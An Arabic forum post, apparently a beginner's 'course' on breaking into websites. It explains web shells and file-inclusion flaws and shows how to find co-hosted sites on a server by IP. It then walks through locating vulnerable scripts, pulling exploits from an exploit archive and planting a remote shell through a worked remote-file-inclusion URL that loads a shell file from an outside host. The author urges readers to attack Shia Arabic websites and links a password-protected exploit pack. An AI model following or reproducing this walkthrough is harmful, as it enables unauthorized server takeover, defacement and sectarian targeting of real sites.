منتدى الطيب

مرحب بكم

ابحث

الدخول السريع

ديسمبر 2016

الإثنينالثلاثاءالأربعاءالخميسالجمعةالسبتالأحد
   1234
567891011
12131415161718
19202122232425
262728293031 

اليومية اليومية


    دورة اختراق المواقع من الألف ............إلى الياء

    شاطر

    admin
    المدير
    المدير

    عدد المساهمات : 141
    تاريخ التسجيل : 25/01/2010
    العمر : 19
    الموقع : http://altaiyb.ahlamontada.com/

    شرح دورة اختراق المواقع من الألف ............إلى الياء

    مُساهمة من طرف admin في الجمعة يونيو 21, 2013 4:23 pm

    نا حقيقه فكرت في انزال كتاب خاص للمبتدئين فقط
    لأني عانيت في بدايتي كثير في امور اختراق المواقع
    كنت اسئل اقول وش معنى شل وشلون ارفعه وش معنى سكريبت وش معنى
    ثغره وكيف اعرف اذا فيه ثغره او لا
    اسئله كثير عانيت منها لكن بعد ماتعمقت في عالم الهكر وجدت ان كل
    المبتدئيين يسئلون مثل اسئلتي هذي واكثرهم متذمر من اختراق المواقع
    يقولون لصعوبته بس رأيت انه سهل جداٌٌ جداٌٌ
    كثير من المبتدئيين يقولون مافي شروحات في المواقع لمبتدأ مثلي
    يامخاوي مايعرف وش معنى سيرفر وشلون تبيه يرفع شل
    طيب انا قلت هالكتاب يكون كامل عن اختراق واستهداف موقع يعني في
    راسك موقع اقرأ هالكتاب وطبق معي وا ثم وا ثم وا لتخترق أي موقع يطب براسك
    بس ركز
    ١. ماهو الشل؟
    ٢. ماهي الثغرات؟
    ٣. ماهي خطوات اختراق موقع؟
    ٤. وكيف نرفع الشل؟
    ٥. وكيف نبحث عن سكريبت مصاب؟
    ٦. وعدد كبير من السكريبتات المصابه مع التطبيق عليها
    ٧. وش نسوي بعد مانرفع الشل؟
    ٨. كيف نرفع اندكس الاختراق؟
    ٩. كيف افتح موقع خاص بي؟
    ftp ١٠ . شرح لبرنامج
    ١١ . بعض الحيل لأختراق سيرفر او موقع معين
    هذي خطوات راح تتعلم منها تخترق أي موقع يطب براسك
    انا قبل لأبدأ
    احب ان اقول شئ عشان لاحد يتهمني بسرقه او ماشابه
    يشهد الله ان هذا الكتاب كله من تأليفي انا
    ومأخذت أي شئ من أي كتاب اخر او أي شرح اخر حتى الصور
    انا واضعها وكامل الشروحات خاصه بي
    واسمح لأي انسان ان ينقل أي شئ يريد من هذا الكتاب بس ان
    يبتعد عن سرقت الحقوق
    وانا أخلي مسؤليتي من أي شخص يستخدم هذا الكتاب ضد أي
    موقع مسلم
    لكن موقع عربي شيعي فيه اغاني فنا اتمنى منكم الا تبقونه
    على هذه الشبكه العنكبوتيه
    وانا اول من يساعدكم في هذا الشئ
    وقبل لأبدأ بأول خطوه اقرأ هذا الجدول زين واحفظه لأن فيه
    كلمات راح تصادفنا كثير وماراح نفهم معناها لو ماقرينا
    هالجدول
    انا ماراح اكتب تعريف كامل انا بكتب الي ابيك تفهمه بس
    والباقي ولايهمك منه شئ
    سيرفر/ كمبيوترذو مواصفات قويه من ناحية سرعة المعالج
    والأداء وسرعة اتصال عاليه
    وهذا هو الي يكون داخله المواقع وكل المواقع بمجلد
    home اسمه
    يعني لو قدرت ترفع شل على أي موقع بسيرفر راح
    تقدر تتحكم بكل المواقع الي على السيرفر
    أي خطأ في الملف نعتبره php
    سكريبت/ ملف مكتوب بلغة
    ثغره ونخترق عن طريقها
    الثغره /عباره عن خطأ برمجي في السكريبت
    الاستغلال/عباره عن كود يقوم بأستغلال الخطأ البرمجي
    (استغلال الثغره)
    الفايل انكلود/ نوع من انواع الثغرات وهو من اخطر انواع
    الثغرات
    وتعتبر الفايل انكلود اسهل ثغره واخطر ثغره

    يعني لازم تفهمه وتحفظه ◌ الي مكتوب بلأحمر مهم جدا
    لاتستصعب شئ من البدايه كل شئ سهل بس ركز
    واوعدك بعد ماتكمل قرايت هالكتاب تكون فاهم كيف تخترق
    وراح تقدر تخترق بعد هالكتاب
    راح نبدأ بأول خطوه
    انا ماراح اشرح شرح علمي كامل انا راح اكتب الي اشوفه يفيد
    المبتدأ وراح ابتعد عن الاسلوب العلمي الي يبعد المبتدأ عن
    جو الموضوع ويخليه يستصعب الهكر بصفه عامه
    وراح نبدأ بأول خطوه
    ماهو الشل؟
    (php) الشل عباره عن ملف يتم كتابته بلغة البي اتش بي
    ويقوم هذا الملف بتوجيه اوامر لسيرفر لفتح مجلد معين او رفع
    اندكس اختراق او أي شئ اخر تريد ان تعمله فبهذا الملف تعمل
    أي شئ تريد بسيرفر...
    هذا الشل يتم رفعه عن طريق الثغرات الموجوده بسكريبتات
    المركبه بالمواقع
    هذا اهم شئ لابد انك تعرفه عن الشل وهذا انت عرفته
    ننتقل للخطوه الثانيه
    ماهي الثغرات؟
    الثغرات هي اصعب شئ في الهكر لابد ان تتعمق فيها اكثر
    وبرفق كتاب هذا الباب خاص عن الثغرات
    **والثغرات تحتاج الى انسان يتحلى بصبر**
    ◌ ابيك تفهم بلأول نقطتين مهمه جدا
    لما تبي تفتح لك موقع تروح تدور شركة استضافه ·
    شركة الاستضافه هذي يكون عندهم شئ اسمه سيرفر ·
    السيرفر يكون على كمبيوتر نظامه لينكس مو زي انظمتنا
    ويندوز
    نظامهم لينكس وهو اسرع بكثير من الويندز واقوى منه
    ^_*
    كل سيرفر يكون بداخله مواقع
    في غلطه كثير من المبتدئين يقع بها وهو لما يبي يرفع شل
    <<بعد قليل راح افهمكم على طريقة رفع شل
    vb انه لما يبي يرفع شل يروح يدور لثغرات المنتدى
    او السكريبتات المركبه على الموقع
    وفي الاخير اذا مالقي ثغره يقول يالله مأقدرت اخترق الموقع
    لا ياحبيبي *_^
    انت لما تبي تخترق موقع تطلع أي بي السيرفر الي عليه الموقع
    لأن لاتنسى اني قلت لكم ان كل موقع يكون داخل سيرفر وكل
    سيرفر يكون داخله مواقع كثيره
    وانت لما ترفع شل على أي موقع موجود بسيرفر راح تتحكم
    بسيرفر كله والتحكم بسيرفر كله يعني التحكم بالمواقع الموجوده
    بسيرفر
    والتحكم كما قلنا بلأول يكون عن طريق الشل
    اذا مافهمت العباره الي فوق فقرها اكثر من مره وراح تفهم
    بس أهم شئ التركيز *_^
    النقطه الثانيه الي حبيت اقلكم عليها ·
    ان الثغرات موجوده بشئ اسمه سكريبت
    بتسئلني وتقولي يامخاوي وش السكريبت ؟
    انا اقلك حبيبي وش السكريبت
    (php) السكريبت عباره عن ملف يتم كتابته بلغة البي اتش بي
    وكل صاحب موقع مركب سكريبتات بموقعه
    بتقلي ليه يامخاوي اصحاب المواقع يركبون سكريبتات وش
    الفائده منه؟
    انا اقلك
    php الحين السكريبت كما قلت عباره عن ملف مكتوب بلغة
    يقوم هذا الملف بخدمة اصحاب المواقع ويسهل لهم امور كثيره
    مثل المنتدى هو عباره عن سكريبت
    وانت تتصفح بعض المواقع تلاقي مكتوب في رئيسية ◌ احيانا
    ٌٌ
    الموقع
    مركز التحميل
    او
    ألبوم الصور
    او
    سجل الزوار
    او
    مكتبة البرامج
    وغيرها غيرها الكثير
    وراح اكتب انواع كثيره من السكريبتات المشهوره عشان تقدر
    تبحث عنها وترفع شل عن طريقها في هذا الكتاب
    الحين راح استعرض لكم بعض صور السكريبتات عشان تفهمها
    زين
    لأني ماودي اتعدا خطوه الا وانا متأكد انك فاهم كل شئ



    لما تظغط على مثلاٌ مكتبة البرامج تلاقي برامج كثيره
    هذا سكريبت
    انا قلت انه يسهل على اصحاب الموقع
    شفتم كيف صاحب الموقع اصلا ماحمل ولا رفع برنامج بس رفع
    السكريبت والسكريبت بداخله البرامج *_^
    الي يهمنا من الكلام هذا كله ان الثغره توجد داخل السكريبت
    ويبي لنا نستغلها
    عشان نقدر نرفع شل
    الثغره عباره عن خطأ برمجي
    وحنا لازم نجيب كود استغلال عشان نقدر نستغل هذا الخطا
    ونرفع شل
    وراح نتطرق لثغرات والاستغلال اكثر بعد اشوي
    الثغرات انواع
    فايل انكلود
    SQL
    XSS
    وانواع كثيره لكن هذي اهم ثلاثه واشهرها
    واخطرها واسهلها الفايل انكلود
    وراح يكون شرح كامل عن الفايل انكلود لحد ماتطبق على موقع
    من خلال الي راح اكتبه هنا
    وهذا شرح كامل لأهم انواع الثغرات
    في هذا الكتاب وانا استفدت منه كثير
    وهذا هو رابط الكتاب
    http://www.hack15.com/Exploits.rar
    وبااسوورد فك الظغط
    كلمة مرور فك الضغط
    hack15
    ماهي خطوات اختراق موقع؟وكيف نرفع الشل؟
    خطوات اختراق موقع هي الاتي
    اول شئ حدد الموقع الي تبي تخترقه
    موقع بيت الهكر ◌ وانا راح اختار مثلا
    رابط الموقع
    http://www.v99x.com/vb/index.php
    اول شئ نطلع أي بي السيرفر
    وهذا شرح بصور لأستخراج أي بي السيرفر الي مركب عليه
    الموقع
    اول شئ نظغط على ابدأ بعدين تشغيل ونكتب
    الامر
    Cmd
    ونظغط انتر



    بعدين تفتح لنا شاشه سوداء

    شوفوا بعد ماكتبنا
    Ping www.***.com
    وظغطنا انتر وش صار

    طريقة نسخ الاي بي لتسهيل عليكم
    بتكون بالخطوات هذي
    اول شئ حط الماوس على الشاشه السوداء الي فيها الاي بي
    اظغط الماوس اليمين
    بيجيك خيارات اول خيار
    الي هو وضع علامه اظغط عليه
    بعدين حدد على الاي بي
    بعدين


    الحين عرفنا نطلع الاي بي وننسخه<<والله الي يسمعه يقول
    مخترع صاروخ*_^
    المهم نروح نبحث عن السكريبتات المركبه على السيرفر
    بتقلي يامخاوي وشلون ابحث عن السكريبتات المركبه في السيرفر
    انا اقلك على الطريقه
    روح احدا مواقع البحث غير قوقل
    وانا افضل
    www.msn.com
    في خانة البحث نكتب الاي بي بهذي الطريقه
    ip:75.126.81.157

    ip: اذا كتبتم كذا 75.126.81.157
    فراح يطلع لكم كل المواقع الي على السيرفر
    واذا تبي تبحث عن سكريبت معين
    فتكتب اسم السكريبت بعد الاي بي
    مثلا تبي تبحث عن سكريبث
    اسمه
    MKPortal
    فيكون كتابة البحث عن هذا السكريبت بهذي الطريقه
    ip:75.126.81.157 MKPortal
    وهذي صوره لتوضيح اكثر

    والان راح اكتب لكم سكريبتات خطيره لما تبي تخترق موقع
    ابحث عنها
    ◌ علما
    ان كل كلمه راح اكتبها تحت كل ماعليك ان تضعها بعد
    رقم أي بي السيرفر
    تبحث وماتلاقي يطلع لك شئ هذا معناته ان مافي ◌ احياناٌ
    ٌ
    سكريبت مركب على أي موقع بسيرفر بنفس الاسم الي بحثت
    عنه
    powered by
    لأستخراج كامل السكريبتات المركبه على السيرفر
    Warning
    لأستخراج الأخطأ
    Upload
    هذا لأستخراج مركز التحميل
    ومركز التحميل له طرق كثيره جدا
    منها
    بالعربي اكتب بعد رقم الاي بي
    مركز التحميل
    وانا افضل البحث عن السكريبت بأسمه العربي
    لأن اكثر اصحاب المواقع يشيل اسم السكريبت من اخر الصفحه
    ويكتب جميع الحقوق محفوظه وقتها ماراح يطلع
    لهذا اكتب اسمه بالعربي اشوف انه افضل بكثير
    MKPortal
    لات  للبحث عن ا
    aspjar guestbook
    للبحث عن سجل الزوار
    او تكتب بالعربي سجل الزوار وراح تجيك
    لسجل الزوار ◌ ايضا
    XP Book
    وهذا سكريبت خطير
    images ٤
    Images
    Glary
    Downloads
    PhpBB
    Powered by : Down Asaher v 2.5
    هذي هنا سكريبتات خطيره
    بالعربي اكتبوا وانا افضل ◌ ايضا
    أٌلكتابه بالعربي مثل ماقلت
    مثل كتابة
    بعد الاي بي
    سجل الزوار
    مكتبة البرامج
    مركز التحميل المجله
    البوم الصور
    وغيرها غيرها الكثير
    ابحث وراح تجد اكثر من سكريبت مصاب بكل سيرفر
    وكل سكريبت تلاقيه روح ابحث عن ثغراته بطريقتين
    الي راح احطه لك الان الاوله موقع
    /http://www.milw0rm.com
    والثانيه عن طريق أي موقع بحث والطريقه موجوده تحت بصور
    وراح تقدر ترفع شل بأذن الله
    مثلا تقول لي يامخاوي انا لقيت سكريبت
    MKPortal اسمه
    من وين اجيب الأستغلال حقه
    انا اقلك حبيبي
    في مواقع مختصه بثغرات السكريبتات كل يوم ينزلون اكثر من
    اربعه ثغرات
    طيب انا اعطيك رابط الموقع اول شئ
    /http://www.milw0rm.com
    وهذي هنا صوره للموقع وفيها بعض الشروحات

    فتحت لنا هالصفحه (search) طيب بعد ماظغطنا على بحث

    وبعد كتابة اسم السكريبت المصاب في الفراغ
    طلع لنا الثغرات وهذي صوره من الي طلع لنا

    Remote File احنا راح نجرب اول ثغره وهي من نوع
    Inclusion
    ◌ جدا ◌ لأنه خطيره وسهله جدا
    نظغط على اول ثغره
    MKPortal NoBoard Module (BETA)
    Remote File Inclusion Vulnerability
    MKPortal
    هذا اسم الثغره

    في ناس يقول كيف اعرف الاستغلال
    أستغلال ثغرات الفايل انكلود
    دائما يجي تحت او بجنب كلمة
    Example
    او يجي اخره
    shell.txt
    او[ shell ]?
    عرفنا الاستغلال بقى علينا نعرف وش نسوي
    قبل لاتعرف بعض المصطلحات المهمه في هذا الاستغلال
    http://[ site
    ]/mkportal/include/user.php?MK_PATH=[ shell ]?
    هذي هنا بدلها تحط رابط الموقع >>[site]
    مثلا نقول ان الموقع
    رابطه كذا
    www.zafrah.net/mkportal
    هذا السكريبت المصاب >>mkportal
    mkportal/include/user.php?MK_PATH
    هذا الاستغلال حق الثغره
    =[ shell ]?
    وبدل هذي هنا تحط رابط الشل كامل
    ول ماعندي شل او ماعندي موقع عشان ارفع عليه شل ◌
    راح اعطيك اخر هالكتاب شرح كامل لفتح موقع مجاني ورفع
    الشل وكل شئ راح يتعلق بمشكلة الشلات
    وبعد ماحطينا رابط الشل يكون الاستغلال هكذا
    http://www.zafrah.net/mkportal/include/user.php?M
    K_PATH=http://www.**********************/powerhos
    ting/ch99.txt?
    تحط علامة استفهام مثل ماوضعت انا txt لاتنسى بعد كلمة
    \
    طيب نفترض ان لقيت ثغرات في المليورم لكن مو منوع فايل
    انكلود
    فقدامك طريقتين يأما تروح تبحث عن شروح عن طريقة استغلال
    نوع ثغره معينه
    ويأما تروح قوقل
    وراح تلاقي شروح عنها مثل
    تروح قوقل وتكتب

    الثغرات كثيره بكل سكريبت أنت ابحث وابتعد عن اليئس
    لعلك تواجه صعوبه في اول مره تستهدف موقع لكن المره
    ومايحتاج له ◌ الثانيه والثالثه خلاص تحس ان الامر سهل جدا
    ٌٌ
    شروحات ولا شئ...
    واسهل سيرفر راح تقدر ترفع عليه شل هو السيرفر الي مواقعه
    كثير والسكريبتات المركبه على المواقع كثيره
    وقتها بس ابحث عن أي سكريت سهل واخترق وانا اخوك
    ^_*
    تلاقي سكريبت وتبي تطلع ثغرات جديده انت تروح ◌ واحيانا
    ٌٌ
    JAAScoisX- تحمل السكريبت في جهازك ووبرنامج اسمه
    يطلع لك الاخطاء الحاصله بسكريبت وانت عليك Code
    الاستغلال
    انا ماشوف هالطريقه له داعي فهمها بنسبه للمبتدئيين لأنه لو
    تعمق فيها وهو لسى مبتدأ راح يحس الهكر صعب
    لهذا اتركها بعد فهمك لكل مافي هذا الكتاب وقدرتك على
    التطبيق وقتها تعلم باقي العلوم المتطوره
    وانا مؤلف هالكتاب على اساس ابتعد عن شئيين الاول طولت
    الكلام الي مالها داعي
    الثاني ابعاد المبتدأ عن الامور الصعبه والكلام الي يخليه يبطل
    يدخل في عالم الهكر
    نكمل شرحنا
    بعد ماحطيت استغلال ثغرة
    Remote File Inclusion
    وحطيت رابط الشل خل نشوف الشل بيفتح لنا او لا
    اذا فتح معناتها ان الثغره مو مرقعه بسكريبت

    تم رفع الشل ولله الحمد
    بعض المبتدئين يمر بأشياء منها اول مايحط رابط الشل
    والاستغلال يجيه صفحة خطأ او يحوله الرابط للمنتدى او رئيسية
    الموقع
    وغيرها...الخ...!
    هنا راح اقلك ان الثغره مرقعه يعني ماتقدر تخترق عن طريقها
    دور سكريبت غيره
    طبق mkportal وبنفس الطريقه الي طبقناها على السكريبت
    على أي باقي السكريبت
    من ناحية البحث عن السكريبت في السيرفر
    ومن ناحية البحث عن استغلالها
    mkportal وكل شئ طبقه بنفس ماسويت في هذا السكريبت
    وارفع شلك وراح تصل للي تبغاه في اقل من مما تتوقع بس
    التركيز اهم شئ في الهكر كله *_^
    طيب بتقولي يامخاوي الحين انا رفعت شل وش اسوي بعدين ان ا
    بقلك الان وش تسوي
    لهذا بغير هذا الشل r اول شئ انا احب شل 57
    r وبحط 57
    اول شئ تسويه هو انك تستعرض كل المواقع الي على السيرفر
    ◌ وقبل لاتستعرضها ابقلك اشياء مهمه جدا

    يتبع




      الوقت/التاريخ الآن هو السبت ديسمبر 10, 2016 3:15 pm